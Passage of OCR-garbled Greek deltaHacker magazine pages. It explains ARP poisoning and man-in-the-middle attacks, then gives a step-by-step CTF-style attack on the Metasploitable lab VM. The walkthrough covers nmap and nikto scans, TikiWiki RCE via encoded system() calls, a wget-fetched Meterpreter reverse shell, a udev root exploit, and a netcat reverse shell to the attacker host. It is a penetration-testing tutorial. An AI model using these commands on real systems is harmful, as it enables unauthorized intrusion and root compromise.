O router Tou τοπι- 
KOU OIKTUOU OTEA- 
vei ARP requests 
στους πελάτες του, 
ὡστε να γνωρίζει 
σε ποια διεύθυνση 
МАС αντιστοιχεί 
κάθε ΙΡ. Μ΄ αυτὀν 
τον τρόπο εἶναι σε 
θέση να δρομολογεί 
εισερχόμενα πακέ- 
τα апо το Internet 
προς τους σωστούς 
παραλήπτες. 
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αυτό και εκπέμπει Eva ARP request, προς όλα ra μηχανήματα rou LAN. 
To εν λόγω request μοιάζει µε το ακόλουθο αἰτημα: "Παιδιά, πείτε µου 
σας παρακαλώ πολύ ποιος апо 'σας ExEI το Τάδε IP address, γιατί έχω 
εδώ Eva IP packet που µου ra χει κάνει τσουρέκια...”. Τα µέλη του LAN 
ακούνε το request κι αρχίζουν va ψάχνονται πανικὀβλητα. Κάποιο an’ 
αυτά θα διαπιστώσει Оті ἐχει IP ἰδιο р’ εκεἰνο που περιλαμβάνεται στο 
ARP request. Αμέσως λοιπὸν θα στείλει eva ARP reply, που θα μοιάζει 
µε το ακὀλουθο: "Κύριε router, µη oKATE алло. Ліко µου εἰν’ auró το IP 
και, παρεμπιπτόντως, то MAC address µου εἰναι ro δείνα!” Ξαλαφρωμέ- 
νος o router θα δείξει μεγάλη εμπιστοσύνη ото ARP reply, οπότε στο 
Ethernet packet που πρέπει να φτιάξει θα συμπληρώσει το ζητούμενο 
MAC address. Αφού στείλει το ὀλο πακέτο στο кало, θα σημειώσει την 
αντιστοἰχιση IP address <--> MAC address που μόλις ἐμαθε. Συγκεκριµέ- 
va, τα ζευγάρια του εἶδους τα γράφει с’ ἑναν πἰνακα που αποκαλεἰ ARP 
cache. Σημειώστε εδὠ OTI παρόμοια ARP caches τηρούν όλα τα µέλη του 
LAN, προκειµένου να ανταλλάσσουν πακέτα IP μεταξύ τους. 


+. OU όμως εἶναι TOEIKO! 


To πρωτὀκολλο ARP εἶναι τόσο anAoiko, σε βαθμό nou Ta ARP replies va 
μην εμπεριέχουν KÄNOIOV μηχανισμὀ πιστοποίησης. Αμέσως αμέσως AUTÒ 
σημαίνει От! οποιοδήποτε μηχάνημα του LAN εἶναι σε θέση va ισχυριστεἰ 
бт! ἐχει το τάδε IP, χωρὶς κανείς va nope να επαληθεύσει την εγκυρότη- 
τα των λεγομένων του. Ακόμα KI ἑνα ARP reply του τύπου "έχω το τάδε 
IP και το δείνα MAC address”, το οποίο απευθύνεται o’ Eva ἡ περισσότερα 
μέλη του LAN και μάλιστα συμβαίνει χωρίς καν να χει προηγηθεί κάποιο 
ARP request, θεωρείται £ykupo κι επομένως кау τα εµπλεκόμενα µηχα- 
νήματα να ενημερώσουν καταλλήλως τις δικὲς τους ARP caches! 
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Προφανώς, αν о router λάβει Eva κἀλπικο (spoofed) ARP reply, αµέσως Ва 
σπεύσει να ενημερώσει την ARP cache του, ενδεχομένως αχρηστεύοντας 
έγκυρη γνώση nou κατείχε πριν To spoofed ARP reply. Την ἴδια στιγµή 
το κακόβουλο μηχάνημα θα μπορούσε va στεἰλει, σ΄’ Eva ἡ περισσότερα 
ἄλλα µέλη Tou LAN, ανάλογες κἀλπικες πληροφορίες, πραγματοποιώντας 
αυτό που εἶναι γνωστό wc ARP cache poisoning ñ апла ARP poisoning. 
Αναρωτιέστε τι καταφέρνει ο επιτιθέμενος р’ AuTA τη δηλητηρἰαση; Πολύ 
апла, µια επιτυχημένη επίθεση τύπου Man-in-The-Middle (MiTM attack). 


Ακολουθεὶ ἑνα anAó παράδειγµα, το onoio ελπίζουμε πως θα διαλύσει 
τα ὀποια νέφη παραμένουν. Έστω OT! ο router ενὸς φιλήσυχου LAN ἐχει 
IP 192.168.0.1 και MAC address 00:00:00:00:00:01*. Ἔστω επἰσης OTI Eva 
αθώο РС, Tou ἴδιου φιλήσυχου LAN, ἐχει IP 192.168.0.10 kai MAC address 
00:00:00:00:00:02. Βάλτε тора στην εικὀνα KI EVA πολεμοχαρὲς αλλά 
ὑπουλο PC, το onoio καιροφυλακτεὶ μέσα στο ἴδιο LAN. Ως ІР ἐχει το 
192.168.0.25 κι ос MAC address то 00:00:00:00:00:03. O router Kal το αθώο 
PC επικοινωνούν μεταξύ τους χωρίς κανένα πρόβλημα. Ξαφνικά, EKEI nou 
γελάνε, την προσοχὴ Tou router anoond ἑνα ARP reply που λέει: “Εἰμ΄ 


ADSL router 
IP = 192.168.0.1 
MAC = 00:00:00:00:00:01 


Σχήµα 2 
Αποστέλλοντας 
παραπλανητικά ARP 
replies o επιτιθέµε- 
voc αφενός εμφανί- 
ζεται στο θύμα ως 
ο router Tou LAN 

κι αφετέρου ως TO 
ἄλλο PC (δηλαδή 
το θύμα) στον 
router... 


Κύριε router; Είμαι ο 192.168.0.10 
και то MAC address µου είναι 
00:00:00:00:00:03 


Victim 
IP = 192.168.0.10 


Attacker 


Γεια хара, φιλαράκο! Είμαι о 
192.168.0.1 και to MAC address 


µου είναι 00:00:00:00:00:03 


Eva χαρούμενο PC µε ІР 192.168.0.10 και MAC address @0:00:00:00:00:03!”. 
"Аха, πολύ ενδιαφέρον”, σκέφτεται ο router και σπεύδει να ενημερώσει 
την ARP cache του. O router μόλις τσίμπησε στο spoofed ARP reply του 
επιτιθέµενου (µε праүратікӧ ІР то 192.168.0.25). Την ἴδια στιγµή, το KA- 
κὀβουλο μηχάνημα απευθύνει ἄλλο Eva spoofed ARP reply, αυτή τη φορά 
προς то PC µε ІР 192.168.0.10. Του λέει: "Γεια σου φιλαράκο µου! Eiai o 
router kai σκέφτηκα va σου υπενθυµίσωτο IP μου, που εἶναι TO 192.168.0.1, 
καθώς και το MAC address µου, που εἶναι το ϱ0:00:00:00:00:03”. "Να ‘oal 


4. Οι διευθύνσεις MAC έχουν μήκος 48bit και ομαδοποιούνται σε 6 ομάδες των 8byte. Καθένα ané αυτά ra byte 
γράφεται σε δεκαεξαδικἠ µορφή. Ένα παράδειγµα αληθινού MAC address εἶναι το 00:50:56:39:1C:D8. 


IP = 192.168.0.25 
МАС = 00:00:00:00:00:03 
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Σχήμα 3 

...10 αποτέλεσµα 
εἶναι µια επιτυχημέ- 
уп επίθεση Мап їп 
The Middle. ПАёоу, 
o επιτιθἐµενος εἶναι 
σε θέση να εξετάζει 
όλα τα ÖIKTUAKA 
πακέτα που διακι- 
vei το θύμα µε τον 
router κι avTioTpo- 
pa. Μερικές ano 
TIG -сихуа ολέθριες 
για ro θύμα- ou- 
νέπειες αυτού TOU 
γεγονότος µπορείτε 
να διαβάσετε στο 
άρθρο που ξεκινά 
ano τη σελίδα 74. 


Victim 
IP = 192.168.0.10 
MAC = 00:00:00:00:00: 


nan 
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καλά, μεγάλε!”, λέει το ανυποψίαστο θύμα και ζωηρά ζωηρά δηλητηριἁ- 
ζει την ARP cache του. Πλέον, τα δικτυακά πακέτα που στέλνει το αθώο 
ΡΟ προς rov router, στην πραγματικότητα καταλήγουν στον επιτιθἐµενο. 
Εκείνος ra εξετάζει, ενδεχομένως та TPONONOIEI και στη συνέχεια TA npo- 
ωθεί στον αληθινό router, σαν va µη συνέβη τίποτε το παράξενο. Avri- 
στροφα, εισερχόμενα πακέτα στο ΙΑΝ τα οποία απευθύνονται στο РС- 
θύμα, o router τα στέλνει στον επιτιθἐµενο. Βλέπετε, έχει παραπλανηθεὶ 
όσον apopä στην πραγµατικἠ του ταυτότητα! Εκείνος βέβαια τα εξετάζει, 
ενδεχομένως ra τροποποιεί κι ακολούθως τα στέλνει στον προβλεπόμενο 
παραλήπτη, ξανὰ σαν να µη συνέβη τίποτε το παράξενο! Kovro^oyic, 
o επιτιθἐµενος EXE] καταφἑρει να μπει ανάμεσα στο αθώο PC και στον 
router (Man-in-The-Middle), xwpic κανεἰς va то χει πάρει εἰδηση! 


Περιττὸ να πούμε ὁτι οι επιθέσεις ΜΙΤΜ µέσω ARP poisoning δεν analı- 
TOUV бт! ἑνα ano τα θύματα πρέπει σώνει και кала va ‘val ο router του 


ADSL router 
IP = 192.168.0.1 
MAC = 00:00:00:00:00:01 


ХЕХЕ, τελικά έχει πλάκα va 


περνάνε aré 'uéva όλα τα πακέτα 


που ανταλλάσσουν αυτοί οι δύο ;) 


Аїїаскег 
IP = 192.168.0.25 
МАС = 00:00:00:00:00:03 


< 


LAN. Επίσης, О αριθµὸς των θυμάτων κάλλιστα μπορεὶ να ξεπερνά та 
δύο: О επιτιθέμενος µπορεἰ να δηλητηριάσει ολόκληρο ro LAN, αν το 
επιθυμεί, αποκτώντας µια ιδιαίτερα προνομιακή -Kı επικἰνδυνη- θέση! 


Περί δημοφιλΐίας και παραδείγματα στην πράξη 


Το ARP spoofing ñ ARP poisoning εἶναι πανεύὐκολο να υλοποιηθεί στην 
πράξη. Υπάρχουν μάλιστα εργαλεία Open Source τα οποία διανέμονται 
ελεύθερα κι ο καθένας εἶναι σε θέση va τα χρησιμοποιεί, μέσα σε àiya 
μόλις λεπτά. Επειδἠ όμως θα μπορούσαμε να γράψουμε каша δεκαριὰ 
χιλιάδες λέξεις και πάλι va µη σας πεἰσουµε για την αποτελεσµατικότητα 
και την ευκολία Tou ARP poisoning, σας προτρέπουµε va γυρίσετε тора 
στη σελἰδα 74 Tou deltaHacker nou κρατάτε στα χέρια σας. 


Συνεχἰστε το διάβασμα, δεν θα το μετανιώσετε ;) 


To deltaHacker είναι το μοναδικό στο χώρο των 
περιοδικών έντυπο που ασχολείται αποκλειστικά 
κι αληθινά µε τον κόσµο του еїһїса! hacking, 
γυρίζοντας συστηµατικά την πλάτη του στον 
καθωσπρεπισµό κι αδιαφορώντας παντελώς για 


την ασφάλεια της θεωρίας. 


Το deltaHacker είναι τόσο σίγουρο για τον 

εαυτό του και τόσο τίμιο κι ευθύ απέναντι στον 
αναγνώστη, που αντί να γυρνάει εδώ κι εκεί στα 
περίπτερα και v αγωνίζεται να φανεί ανάμεσα 
στις Σούπερ-Κατίνες και στα PC-something-bored, 
έρχεται κατευθείαν στο σπίτι σας - κι έρχεται για 
να σας κατακτήσει. 


Αν είστε από εκείνους που δεν βλέπουν τον 
υπολογιστή τους WC άλλη µια οικιακή συσκευή 
και δεν αντιμετωπίζετε το Internet wc ένα δίκτυο 
που αρχίζει και τελειώνει µε το Facebook και το 
Twitter, τότε είναι 102% βέβαιο ότι θ’ αγαπήσετε 
το deltaHacker, καθώς κι ότι θα θέλετε την 
παρέα του και τους 12 µήνες του χρόνου! 


Όλες οι πληροφορίες για όλα τα προγράμματα 
συνδρομών είναι στο 


deltahacker.gr/subscriptions 


deltaHacker: Hacking for the rest of us. 
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HD Moore we Morto: Another reason to 
Mon, 29 Aug 2011 


Απάντηση oro ερώτημα θα προσπαθήσουμε να δώσουμε oro napóv ap- 
θράκι, ayannTEG φίλες και φίλοι. H απἀντησή µας ὁμως θα φροντίσουμε 
να µην εἶναι φιλοσοφική — οὐτε καν θεωρητικἠ. Αντίθετα, θα δούµε στην 
πράξη πόσο εὐκολο εἶναι για κάποιον ν΄ αποκτήσει µη εξουσιοδοτηµένη 
πρόσβαση µε δικαιώματα υπερχρήστη о’ EVA κακοσυντηρημένο μηχάνη- 
μα! 


Па τις ανάγκες του παρὀντος ἄρθρου θα χρησιμοποιήσουμε ως στόχο 
το Metasploitable, µια εικονικἠ μηχανὴ (virtual machine, VM) δηµιουρ- 
γημένη µε ro VMware η οποία παρέχεται ελεύθερα και δωρεάν and την 
ομάδα ανάπτυξης του Metasploit Framework (www.metasploit.com). Па 
όσους δεν το ‘xav ακούσει ἡ δεν ETUXE ποτὲ у’ ασχοληθούν р’ αυτὀ, ν΄ 
αναφέρουμε επιγραμματικἁ ὁτι το Metasploitable εἰν’ eva VM µε host 
OS ro Ubuntu Server 8.04. Λόγω του πλήθους rov µη ενημερωμένων 
εφαρμογών που τρέχει αποτελεἰ Eva ἄκρως ευπαθὲς σύστημα, anoka- 
λύπτοντας στον KÄDE ενδιαφερόμενο µια μεγάλη attack surface. Ίσως 
προκαλεἰ εντύπωση AUTO, µια που μιλάμε για Linux server. Κι όμως, δεν 
υπάρχει λειτουργικὸ σύστημα που va *unv* ενημερώνεται και va ‘val 
ασφαλές. Εἶναι προφανὲς, λοιπὸν, бт! Eva VM σαν To Metasploitable 
αποτελεἰ τον κατάλληλο στὀχο για ὁποιον επιθυμεὶ να εξασκηθεἰ στο 
penetration testing αλλά χωρὶς -και το τονίζουµε αυτό- va επιτεθεἰ σε 
праүратіка συστήματα, Ta onoia EITE δεν του ανήκουν EITE δεν του EXE! 
δοθεἰ σχετικἠ εξουσιοδότηση. Μπορείτε να κατεβάσετε To VMware image 
του Metasploitable µέσω BitTorrent, απὀ το Рїгаїе Вау: 


http://bit.ly/getmetasploitable 


Κατεβάστε то тора, αλλιώς δεν συνεχίζουμε. 


mini Λιαγωνισμάς CTF 
ri 


Ἕνας μικρὀς, ενδιαφέρων διαγωνισμός! 


Πριν ξεκινήσουμε θα θέλαμε να κάνουμε uia παραδοχἠ που σίγουρα θα 
δυσκολέἑψει το ἐργο µας, θα ro κάνει όμως πολύ πιο ενδιαφέρον. Ας uno- 
θέσουμε, λοιπὀν, ότι βρισκόμαστε o’ Evav διαγωνισμό CTF (Capture The 
Flag) και οι κανόνες απαγορεύουν ρητά τη χρήση rou Internet! 


Па τις ανάγκες της επἰθεσἠς µας, λοιπὸν, θα καταφύγουμµε σε εργαλεία 
που *óÀq* τους βρίσκονται στο BackTrack 5 (www.backtrack-linux.org), 
ενώ φυσικἀ θα βάλουμε και το μυαλό µας να δουλέψει. Μην το ψάχνετε. 
Δεν υπάρχει καλύτερος σύμμαχος για TETOIOU EIÖOUG προκλήσεις. 


Βήμα 10 - information gathering 


То прото πράγμα nou EXOUHE να κάνουμε εἶναι у’ ανακαλύψουμε τη ÖIEU- 
θυνση IP nou ἐχει ro Metasploitable. 


Σ’ Eva παράθυρο τερματικού πληκτρολογούμε 
root@bt:~# nmap 192.168.178.* 


MOTE va ελἐγξουµε ὁλο TO δίκτυο (µέσα στο οποίο AVA KOUHE εμείς KI TO 
μηχάνημα-στὀχος) yia evepyä һоѕіѕ!. Meta ano λίγη opa, μεταξὺ των 
αποτελεσμάτων θα δούμε ra ακόλουθα: 


Nmap scan report for noname (192.168.178.26) 
Host is up (0.00020s latency). 

Not shown: 988 closed ports 

PORT STATE SERVICE 

21/tcp open ftp 

22/tcp open ssh 

23/tcp open telnet 

25/tcp open smtp 

53/tcp open domain 

80/tcp open http 

139/tcp open netbios-ssn 

445/tcp open microsoft-ds 

3306/tcp open mysql 

5432/tcp open postgresql 

8009/tcp open ajp13 

8180/tcp open unknown 

MAC Address: 00:0C:29:40:0F:B4 (VMware) 


Ωραία! Έχουμε στα χέρια µας την πρώτη ενδιαφέρουσα πληροφορία! 
Má8ays бт! ο στὀχος βρίσκεται στη διεύθυνση 192.168.178.26. Επόμενη 
κίνηση εἶναι να ελέγξουμε τι εφαρμογὲς τρέχουν στ’ ανοιχτά του ports. 
Θα χρησιμοποιήσουμε ξανὰ To nmap αλλά ropa θα του περάσουμε την 
παράμετρο -sV, η οποία θα µας εμφανίσει και την ἐκδοση κάθε δικτυακής 
εφαρµογἠς που τρέχει στο στὀχο. 


root@bt:~# птар -O -sV 192.168.178.26 


1. To δικὀ σας τοπικὀ δίκτυο ενδέχεται va ‘val διαφορετικὀ, όπως, N.X., 192.168.0.* ἡ 10.0.0.* κ.ο.κ 


23 


VHAOKER 


NK IN NNN 


Starting Nmap 5.51 ( http://nmap.org ) at 2011-06-24 13:16 EEST 
Nmap scan report for-noname (192.168.178.26) 

Host is up (0.00026s latency). 

Not shown: 988 closed ports 


PORT STATE SERVICE VERSION 

21/tcp open ftp ProFTPD 1.3.1 

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 
(protocol 2.0) 

23/tcp open telnet Linux telnetd 

25/tcp open smtp Postfix smtpd 

53/tcp open domain ISC BIND 9.4.2 

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) 


PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch) 

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 

5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 

8009/tcp open ајр13? 

8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 
MAC Address: 00:0C:29:40:0F:B4 (VMware) 

Device type: general purpose 

Running: Linux 2.6.X 

OS details: Linux 2.6.9 - 2.6.31 

Network Distance: 1 hop 

Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux 


Μάλιστα. Το прото πράγμα nou µας περνά ano To puaAó εἶναι va ελἐγ- 
ξουμετι υπάρχει στο port 80. Апо ¿vav onoiovórjnore web browser δοκι- 
μάζουμε va επισκεφτούμε τη διεύθυνση 


http://192.168.178.26 


Δυστυχώς ὁμως TO αποτέλεσµα δεν εἶναι καθόλου κατατοπιστικὀ, µιας 
κι εμφανίζεται μόνο ша ἄσπρη σελἰδα р’ Eva ξερό “It works!”. Έτσι OKE- 
φτόμαστε λίγο πονηρὰ. Θα βάλουμε Eva εργαλεἰο να ψάξει yia evepyä 
directories και πιθανά vulnerabilities στο μηχάνημα-στὀχο. Το εν λόγω 
εργαλείο εἶναι το nikto: 


root@bt:~# cd /pentest/web/nikto/ 
root@bt:/pentest/web/nikto# perl nikto.pl -h 192.168.178.26 
- Nikto v2.1.4 

* Target IP: 192.168.178.26 

* Target Hostname: 192.168.178.26 

* Target Port: 80 


mini Λιαγωνισμάς СТЕ 
LOI 


+ Start Time: 2011-06-25 13:20:52 


+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with 
Suhosin-Patch 


+ ETag header found on server, inode: 67575, size: 45, mtime: 
0x481ffa5ca8840 


+ Apache/2.2.8 appears to be outdated (current is at least 
Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also 
Current. 


+ Number of sections in the version string differ from those in 
the database, the server reports: php/5.2.4-2ubuntu5.10 while 
the database has: 5.3.5. This тау cause false positives. 


+ PHP/5.2.4-2ubuntu5.10 appears to be outdated (current is at 
least 5.3.5) 


+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 


+ OSVDB-877: HTTP TRACE method is active, suggesting the host is 
vulnerable to XST 


* Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.10 


+ OSVDB-3233: /phpinfo.php: Contains PHP configuration 
information 


+ OSVDB-3268: /icons/: Directory indexing found. 
+ OSVDB-3233: /icons/README: Apache default file found. 


+ OSVDB-40478: /tikiwiki/tiki-graph formula.php?w=1&h=1&s=1&min 
-1&max-2&f[]-x.tan.phpinfo()&t-png&title-http://cirt.net/rfiinc. 
txt?: TikiWiki contains a vulnerability which allows remote 
attackers to execute arbitrary PHP code. 


+ 6448 items checked: 2 error(s) and 11 item(s) reported on 
remote host 


* End Time: 2011-06-25 13:21:43 (51 seconds) 


Αφού ολοκληρωθεί η διαδικασία εξετάζουμε τ’ αποτελέσµατα. ANOKTAJE 
ETO! µια πολύ χρήσιμη πληροφορία για το στὀχο: Υπάρχει Eva directory 
ονόματι /tikiwiki/ µε εγκατεστημένη την ἐκδοση 1.9.5 του ομώνυμου 
wiki software. 


Тора, Aóyo του περιορισμού που θέτει TO CTF *dgv* μπορούμε va wa- 
ξουµε στο Internet yia κάποιο ἑτοιμο exploit. Δεν σκοπεύουµε όμως va 
το βάλουμε като! Παρατηρούμε ξανὰ To report rou nikto κι εστιάζουµε 
στο ακόλουθο τμήμα: 


+ OSVDB-40478: /tikiwiki/tiki-graph formula.php?w=1&h=1&s=1&min 
=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://cirt.net/rfiinc. 
txt?: TikiWiki contains a vulnerability which allows remote 
attackers to execute arbitrary PHP code. 


Δοκιμάζουμε va επισκεφτούµε TO ακόλουθο URL, ώστε va SOULE TI avra- 
πόκριση θα πάρουμε an’ το στὀχο: 


http://192.168.178.26/tikiwiki/tiki-graph formula.php?w=1&h=1&s= 
1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title= 
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Βήμα 20 - exploiting the target 


Υπάρχει ὀντως EVA -δυνάμει- kevó ασφαλείας, то οποίο ενδέχεται va επι- 
τρέψει o’ évav attacker να εκτελέσει στο απομακρυσμένο σύστημα Ö,TI 
εντολές επιθυμεί. To kevó ασφαλείας οφείλεται στο apyeio tiki-graph_ 
formula.php, ro οποίο δεν φιλτράρει σωστά τα inputs του χρήστη. To 
αποτέλεσµα της επἰσκεψης του προηγούμενου URL εἶναι να µας επιστρα- 
PEI кат! σαν την εικὀνα 1. Όπως μπορούμε να αντιληφθούμε, µέσω της 
παραμέτρου "f" εἶναι δυνατή η κλήση συναρτήσεων της PHP, ónog η 
phpinfo(). Αρχίζουµε v’ avaporióuaore TI θα γινόταν av, π.χ., avri για τη 
συνάρτηση phpinfo() καλούσαμε τη system()! 


Κρίνοντας ano το αποτέλεσµα της προηγούμενης εκτέλεσης μπορούμε va 
φαντασούμετι. Αλλά ας To δοκιμάσουµε. Μια απλἠ εντολἠ που μπορούμε 
να περάσουμε στη συνάρτηση system() εἶναι η Is, η οποία επιστρέφει µια 
Лота µε τ’ αρχεία και τους υποκαταλόὀγους rou τρέχοντα καταλὀγου. Αντὶ 
ὁμως yia "Is", στο URL πρέπει να δώσουμε τους κωδικούς ASCII των "I" 
και "s" (www.asciitable.com). Λόγω ӧрос̧ του περιορισμού Tou CTF *õev* 
μπορούμε ν΄’ ανατρέξουµε oro Internet και να ψάξουμε τους κωδικούς 
ASCII που αντιστοιχούν στα “|” kai "s". Δεν πειράζει, μπορούμε va τους 
βρούμε κι αλλιώς. Σ’ Evav text editor, π.χ., oro nano, γράφουμε Eva μι- 
κρὀ Perl script kai τ’ αποθηκεύουμε ως chr.pl: 


$cmd = "ls"; 
foreach $i (unpack('C*', $cmd)) 
{ 
print "chr(".$i.") "3 
} 
print "\n"; 


Σε Àiyo TO OKPINTAKI AUTO θ’ αποδειχθεἰ πολύτιμο, αφού θα ro хрпо!но- 
ποιήσουμε yia να βρούμε Ta ASCII codes ενός ката поло μεγαλύτερου 
string ano ro $cmd. Προς το napóv το EKTEÄOUJIE κι αμέσως παίρνουμε 
τους ASCII κωδικούς µας: 


root@bt:~# perl chr.pl 
chr(108) chr(115) 
root@bt :~# 
Τελικά, το νέο URL nou επισκεπτόµαστε εἶναι το ακὀλουθο: 


http://192.168.178.26/tikiwiki/tiki-graph_formula. php ?w=1&h=1&s= 
1&min-1&max-2&f[]-x.tan.system(chr(108).chr(115))&t-png&title- 


Βλέπουμε ὁτι καταφέραμε va εκτελέσουµε επιτυχώς την EVTOAN 15 στο 
στὀχο µας. Apa, µε τον ἴδιο τρόπο θα μπορούμε va εκτελέσουµε KI GA- 
λες εντολές, ὁπως cp, mv, wget κ.ο.κ. Όλες τους, όμως, θα ουν τα 
δικαιώματα του απομακρυσμένου χρήστη www-data. Μην ανησυχείτε, θα 
κάνουμε ό,τι μπορούμε ὥστε να EKTENEOOUJIE εντολὲς апо το λογαριασμὸ 
του (απομακρυσμένου) χρήστη root. Κάθε праүра στην opa του, орос. 
Προς το napóv θα δοκιµάσουµε να σηκώσουμε Eva backdoor shell στο 
στὀχο. Θυμίζουμε ὁτι δεν μπορούμε va κατεβάσουµε κάποιο ἑτοιμο shell 
ano ro Internet, κανεὶς ωστόσο δεν µας απαγορεύει να φτιάξουμε Eva pò- 
voi µας. Oa καταφύγουµε στο msfpayload του Metasploit, µε To onoio θα 
κατασκευάσουµε Eva reverse tcp Meterpreter payload γραμμένο σε PHP: 
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root@bt:~# msfpayload php/meterpreter/reverse tcp 
LHOST=192.168.178.25 LPORT-4444 R > shell.php 


(όπου 192.168.178.25 εἶναι η διεύθυνση IP Tou BackTrack box). Αφού δηµι- 
oupynesi το αρχείο shell.php, το µετονομάζουµε σε shell.txt: 
root@bt:~# mv shell.php shell.txt 
Στη συνέχεια TO αντιγράφουµμε στον κατάλογο /var/www και του αλλά- 
ζουμε Ta δικαιώματα: 
root@bt:~# cp shell.txt /var/www 
root@bt:~# cd /var/www 
root@bt:/var/wwwH# chmod 777 shell.txt 
Τέλος, ενεργοποιούµε rov Apache web server Tou BackTrack: 
root@bt:~# /etc/init.d/apache2 start 
Σκοπεύουµε να εκτελέσουµε oro μηχάνηµα-στόχο την EVTOAN 
wget http://192.168.178.25/shell.txt -O temp/shell.php 


Προφανώς, θα ‘xEl ως αποτἐλεσµα να µεταφερθεἰ το αρχείο shell.txt ano 
TO ипхаупна нас с’ EKEIVO του στὀχου και va καταλήξει oro directory 
temp? µε т’ ὀνομα shell.php. Έτσι, αλλάζοντας то Perl script nou ypäwa- 
µε πριν λίγο µετατρέπουµε όλη την προηγούµενη εντολἠ σε ακολουθία 
ASCII codes και την EKTEAOUHE στο απομακρυσμένο box µέσω της συ- 
νάρτησης system(): 


http://192.168.178.26/tikiwiki/tiki-graph_formula.php?w=1&h=1 
&s-1&min-1&max-2&f[]-x.tan.system(chr(119).chr(103).chr(101). 
chr(116).chr(32).chr(104).chr(116).chr(116).chr(112).chr(58). 
chr(47).chr(47).chr(49).chr(57).chr(50).chr(46).chr(49).chr(54). 
chr(56).chr(46).chr(49).chr(55).chr(56).chr(46).chr(50).chr(53). 
chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46). 
chr(116).chr(120).chr(116).chr(32).chr(45).chr(79).chr(32). 
chr(116).chr(101).chr(109).chr(112).chr(47).chr(115).chr(104). 
chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112)). 
die()&t-png&title- 


Και μετὰ απ΄ αυτό ανοίγουμε алло Eva παράθυρο τερματικού στο μηχάνη- 
ра µας και ξεκινάμε £vav multi handler listener: 

msf > use exploit/multi/handler 

msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp 

PAYLOAD => php/meterpreter/reverse_tcp 

msf exploit(handler) > set LHOST 192.168.178.25 

LHOST => 192.168.178.25 

msf exploit(handler) > set LPORT 4444 

LPORT => 4444 

msf exploit(handler) > exploit 

[*] Started reverse handler on 192.168.178.25:4444 

[*] Starting the payload handler... 


2. Στο directory αυτό ο χρήστης www-data ἐχει δικαιώµατα εγγραφἠς, ὅπως eUKoha μπορούμε va 
διαπιστώσουμε εκτελώντας στο απομακρυσμένο μηχάνημα την εντολή "Is -ἰα”. 
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Έχοντας тора ενεργοποιημένο στο μηχάνημα µας rov listener va пєрїнё- 
VEI για Känoia σύνδεση στο port 4444, επιστρἐφουµε στον web browser 
και στην address bar δίνουμε TO 


http://192.168.178.26/tikiwiki/temp/shell.php 


ώστε να EKTEMEOTEI TO shell.php και να δοκιμάσει va кау σύνδεση nioo 
σ΄ εμάς! Kal ναι, προς μεγάλη µας ικανοποίηση διαπιστώνουμε бт! ano- 
κτήσαμε local πρὀσβαση στο μηχάνηµα-στόχο. Σκοπὸς тора εἰναι να επι- 
TUXOUJIE -pE κἀποιον τρὀπο- privilege escalation ki апо τον unprivileged 
χρήστη www-data να περάσουμε о’ αυτόν του root! 


Βήμα 30 - rooting the box... 


То прото праүра που ελέγχουμε εἶναι Ta services που τρέχουν (στο στὀ- 
χο) µε δικαιώματα root. Εκτελούμε TO 


ps aux | grep root 


και στεκόµαστε για Àiyo στο udev: 


root 2576 0.0 0.1 2224 652 ? S<s 07:40 0:00 /sbin/ 
udevd --daemon 


Μέχρι την ἐκδοση 1.4.1 To udev δεν ήλεγχε av Eva netlink message npo- 
ερχόταν ano ro kernel space ἡ ro user space, р’ αποτέλεσα να επιτρέπει 
σε απλούς χρήστες ν΄ αποκτούν δικαιώματα root. Па у’ ανακαλύψουμε 
την τρέχουσα ἐκδοση του udev γράφουμε 


udevinfo --version 
και παίρνουμε "117", επομένως EXOUHE va KÄVOUJIE pe την ёкбооп 1.1.7. 


ψάχνουμε Aoinóv στη local database nou διαθέτει ro BackTrack yia δια- 
θἐσιµα udev exploits... 


root@bt:~# grep -i "udev" /pentest/exploits/exploitdb/files.csv 


8478, platforms/linux/local/8478.sh,"Linux Kernel 2.6 UDEV Local 
Privilege Escalation Exploit", 2009-04-20,Kingcope, linux, local, O 


8572, platforms/linux/local/8572.c,"Linux Kernel 2.6 UDEV 
< 141 Local Privilege Escalation Exploit”, 2009-04-30," Jon 
Oberheide", linux, local,@ 


Ανακαλύψαμε δύο exploits τα οποία αμφότερα παἰζουν σε προγενέστερες 
της 1.4.1 εκδόσεις του udev. Εστιάζουµε στο 8572.c το οποίο και αντι- 
γράφουμε στον κατάλογο /var/www: 


root@bt:~# cp /pentest/exploits/exploitdb/platforms/linux/ 
local/8572.c /var/www/ 


Επιστρέφουµε στο TEPHATIKO nou παρέχει local просВасп στο στὀχο, 
κατεβάζουμε ro exploit EKEI 


wget http://192.168.178.25/8572.c 
κι αµέσως ro µεταγλωττίζουμε: 
gcc 8572.c -ο exploit 


Στη συνέχεια δημιουργούμε Eva αρχείο µε την ονομασια "run" μέσα στον 


mini Λιαγωνισμάς CTF 
LLL 


κατάλογο /tmp, WOTE όταν εκτελεστεί ro exploit va δοκιμάσει HE Tn σειρἁ 
TOU να εκτελέσει TO εν AOYW apygio - αλλά µε δικαιώματα root. 


echo '#!/bin/sh' >> /tmp/run 
echo '/bin/nc -e /bin/sh 192.168.178.25 1337' »» /tmp/run 


Σε Eva veo παράθυρο τερματικού rou BackTrack ξεκινάμε vav listener 
yia ro port 1337: 


root@bt:~# nc -lvp 1337 
listening on [any] 1337 ... 


Па va єктєАёсоинє ro exploit πρέπει να γνωρίζουμε ro PID rou udev. 
Ὅπως εἰδαμε πριν, στο napddelyya µας το 2576. Προσοχή: TO συγκεκρι- 
